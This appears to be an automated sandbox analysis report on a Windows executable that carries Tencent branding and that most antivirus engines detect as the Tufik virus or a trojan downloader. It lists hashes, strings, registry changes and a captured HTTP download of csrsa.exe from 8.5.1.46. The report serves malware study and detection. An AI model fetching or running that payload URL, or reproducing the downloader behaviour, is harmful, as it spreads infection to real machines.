Analysis Date2015-01-31 05:47:33
MD50d5fa3c498db7daebf5203b157b1d21b
SHA15cbf01d3176340aca7959a52ada6c0a6e4f1f00f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d2c486cf7680c4b2df3b8da3525bfc80 sha1: 35556fd24d77900c77e132e29a81f5142514c058 size: 16384
Section.rdata md5: 07386cc90bc4ac50f17e64f904797c57 sha1: c798f7f04bc987075b3a8e89a96ba8e8bc1a1e6c size: 8192
Section.data md5: 6d82c6128cfab585c51e44cea92557c0 sha1: d741cc747c596dcd56d6b915d21dd88baa491278 size: 4096
Section.rsrc md5: 7c12bec57a3a6226ed1f4b350238bf10 sha1: 8d9a89d83051f87c7ee005f5a7ead6812cfe3311 size: 12288
Section.text md5: acfc6c482a97c8e970a8458717086b86 sha1: 7cbce79b4656ecdcd216df296ff01f39590339bb size: 8192
Timestamp2013-08-14 07:24:07
Pdb pathD:\smartloader\kernel_proj\trunk\kernel_smartloader\bin\ReleaseA\pdb\KernelSmartLoader.pdb
VersionLegalCopyright: Copyright (C) 1998-2013 Tencent. All Rights Reserved
InternalName: KernelSmartLoder
FileVersion: 7, 15, 0, 1
CompanyName: Tencent
ProductName: 腾讯页游微端
ProductVersion: 7, 15, 0, 1
FileDescription: 腾讯页游微端
OriginalFilename: 腾讯页游微端
PEhash5c15331f058d653c677361113d2026182f4ddc56
IMPhash6b4c95449063674e060dffe4255777ed
AV360 SafeVirus.Win32.TuFik.C
AVAd-AwareWin32.Tufik.P
AVAlwil (avast)Tufik:Win32:Tufik
AVArcabit (arcavir)Win32.Tufik.P
AVAuthentiumW32/Tufik.A.gen!Eldorado
AVAvira (antivir)TR/Dldr.Genome.agor
AVBullGuardWin32.Tufik.P
AVCA (E-Trust Ino)Win32/tufik.J
AVCAT (quickheal)W32.Tufik.gen
AVClamAVTrojan.Downloader-98394
AVDr. WebTrojan.DownLoader.4268
AVEmsisoftWin32.Tufik.P
AVEset (nod32)Win32/Tufik.NAA virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Tufik.A.gen!Eldorado
AVF-SecureWin32.Tufik.P
AVGrisoft (avg)Win32/Tufik.A
AVIkarusVirus.Win32.Tufik
AVK7Error Scanning File
AVKasperskyVirus.Win32.Pioneer.ak
AVMalwareBytesno_virus
AVMcafeeW32/Tufik
AVMicrosoft Security EssentialsVirus:Win32/Tufik.D
AVMicroWorld (escan)Win32.Tufik.P
AVRisingWin32.Tufik.p
AVSophosW32/Tufik-Fam
AVSymantecW32.Tufik.B!inf
AVTrend MicroPE_TUFIK.JK
AVVirusBlokAda (vba32)Virus.Expiro.ad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 1248 -e 188 -g
Creates Mutexopen
Creates MutexDBWinMutex
Winsock DNS8.5.1.46
Winsock URLhttp://8.5.1.46/csrsa.exe

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1248 -e 188 -g

Network Details:

DNS85773.com
Type: A
8.5.1.46
HTTP GEThttp://8.5.1.46/csrsa.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 8.5.1.46:80

Raw Pcap
0x00000000 (00000)   47455420 2f637372 73612e65 78652048   GET /csrsa.exe H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20382e35 2e312e34 360d0a43   ost: 8.5.1.46..C
0x000000b0 (00176)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000c0 (00192)   416c6976 650d0a0d 0a                  Alive....


Strings
\
/\@
\

080404b0
7, 15, 0, 1
About
CompanyName
Copyright (C) 1998-2013 Tencent. All Rights Reserved
Copyright (C) 2009
&File
FileDescription
FileVersion
h&About ...
&Help
iE&xit
InternalName
@jjj
KernelSmartLoder
LegalCopyright
OriginalFilename
ProductName
ProductVersion
smartloader
SMARTLOADER
smartloader Version 1.0
StringFileInfo
System
Tencent
Translation
VarFileInfo
VS_VERSION_INFO
"+^ +]
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
[0Y0W0U
100208000000Z
130814074134Z0#
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
1(c) 2006 VeriSign, Inc. - For authorized use only1E0C
200207235959Z0
2Terms of use at https://www.verisign.com/rpa (c)101.0,
??3@YAXPAX@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z
92ttVj
9:ttWj
_access
_acmdln
_adjust_fdiv
_amsg_exit
      <assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.762" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
</assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@V?$_String_const_iterator@DU?$char_traits@D@std@@V?$allocator@D@2@@2@0@Z
.?AV?$TTenioPtr@VITenioComponentFactory@Tenio@@$0A@@Tenio@@
.?AVtype_info@@
bad allocation
?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE?AV?$_String_iterator@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ
_cexit
_chmod
CloseHandle
CoInitialize
Config\KernelDebug.ini
_configthreadlocale
_controlfp_s
CopyFileA
CoUninitialize
CreateAcceleratorTableA
CreateComponent
CreateDirectoryA
CreateFactory
CreateFileA
CreateProcessA
CreateToolhelp32Snapshot
_crt_debugger_hook
__CxxFrameHandler3
D$0hTR@
D$8SUVW
D$8UVW
@.data
_decode_pointer
DefaultValue
  </dependency>
  <dependency>
    </dependentAssembly>
    <dependentAssembly>
DestroyAcceleratorTable
DispatchMessageA
__dllonexit
DllPath
D:\smartloader\kernel_proj\trunk\kernel_smartloader\bin\ReleaseA\pdb\KernelSmartLoader.pdb
D$tSVW
E4h0R@
_encode_pointer
E+QLI4
_except_handler4_common
F0t$h\S@
(f@f;F
FileTimeToLocalFileTime
FileTimeToSystemTime
?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z
FreeLibrary
GetACP
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetFileAttributesA
GetLocaleInfoA
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleHandleA
_getpid
GetPrivateProfileIntA
GetPrivateProfileStringA
GetProcAddress
GetProcessTimes
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadLocale
GetTickCount
GetVersionExA
#http://crl.verisign.com/pca3-g5.crl04
#http://logo.verisign.com/vslogo.gif04
http://ocsp.verisign.com0
https://www.verisign.com/cps0*
https://www.verisign.com/rpa0
hx5G e
	image/gif0!0
_initterm
_initterm_e
InterlockedCompareExchange
InterlockedExchange
_invalid_parameter_noinfo
_invoke_watson
IsDebuggerPresent
_ismbblead
kernel
Kernel
KERNEL32.dll
KernelFactory.dll
kernel.ini
KernelPluginLoader.dll
KERNELSMARTLOADER
KERNELSMARTLOADER::
KernelTenFact.dll
KernelTenio.ini
Kuinet_ntoa
KuWs2_32
:KuWSAStartup
LoadLibraryA
_localtime64
Log2File
_mbschr
_mbsnbcpy_s
_mbsrchr
memset
MessageBoxA
Module32First
Module32Next
MSVCP80.dll
MSVCR80.dll
NotUseDefaultDllPath
	?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
ole32.dll
_onexit
OutputDebugStringA
__p__commode
__p__fmode
pluginloader
Process32First
Process32Next
productname
QQ.exe
QQPenguin
QSWh\U@
QueryPerformanceCounter
`.rdata
ReadFile
Recycler
Redirect
ReleaseFactory
?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z
Run() bRun=%d
Run() szIniPath=%s szProductName=%s
__set_app_type
SetEndOfFile
SetFilePointer
SetUnhandledExceptionFilter
__setusermatherr
%s.exe
shell32
SHELL32.dll
SHGetSpecialFolderPathA
ShowErrorInfo
ShowTraceInfo
ShowVerboseInfo
%s\KernelLog\%02d%02d_%02d%02d%02d%03d.log
%s\KernelLog\Log.log
_snprintf_s
%s\QQPet\Registrar
%s\QQPet\Registrar\%s.ini
"%s" %s
%s\%s.exe
%s:%s %s
%s\Temp\KernelUpdate\%s
strcat_s
strcpy_s
strftime
_stricmp
strtoul
?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
svLugethostbyname
Symantec Corporation100.
'Symantec Time Stamping Services CA - G2
T$0hdR@
TenioDllFreeMap
[Tenio_Error] Can't find CreateComponent().
[Tenio_Error] CreateComponent(ComponentId=%u) return null.
[Tenio_Error] Create ComponentFactory in %s Fail
[Tenio_Error] Load %s Fail.
Tenio Initialize!
TenioSetDllSafe
Tenio Uninitialize!
TerminateProcess
?terminate@@YAXXZ
.text 
@.text 
!This program cannot be run in DOS mode.
_time64
TranslateAcceleratorA
TranslateMessage
T$<RSSj SSS
T$$RVP
t$WhnB@
?_type_info_dtor_internal_method@type_info@@QAEXXZ
uCloseHandle
uCreateFileA
uCreateFileMappingA
uCreateMutexA
uCreateThread
uFindClose
uFindFirstFileA
uFindNextFileA
uGetDriveTypeA
uGetFileSize
uGetLastError
uGetLocalTime
uGetLogicalDriveStringsA
uGetTempPathA
uGlobalAlloc
uGlobalFree
^u%htT@
uLoadLibraryA
ulstrcatA
ulstrcmpA
ulstrcpyA
ulstrlenA
uMapViewOfFile
UnhandledExceptionFilter
_unlink
_unlock
updateexe
URLDownloadToFileA
Urlmon
user32
USER32.dll
uSetEndOfFile
uSetFilePointer
ushlwapi
uSleep
uStrStrIA
uUnmapViewOfFile
uWriteFile
%VeriSign Class 3 Code Signing 2010 CA
%VeriSign Class 3 Code Signing 2010 CA0
<VeriSign Class 3 Public Primary Certification Authority - G50
VeriSign, Inc.1
VeriSignMPKI-2-80
VeriSign Trust Network1:08
VeriSign Trust Network1;09
version
Version
vShellExecuteA
_vsnprintf_s
~?VWSU
WINDOW
WriteFile
wRtlMoveMemory
WVh,T@
_XcptFilter
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z
%Y/%m/%d %H:%M:%S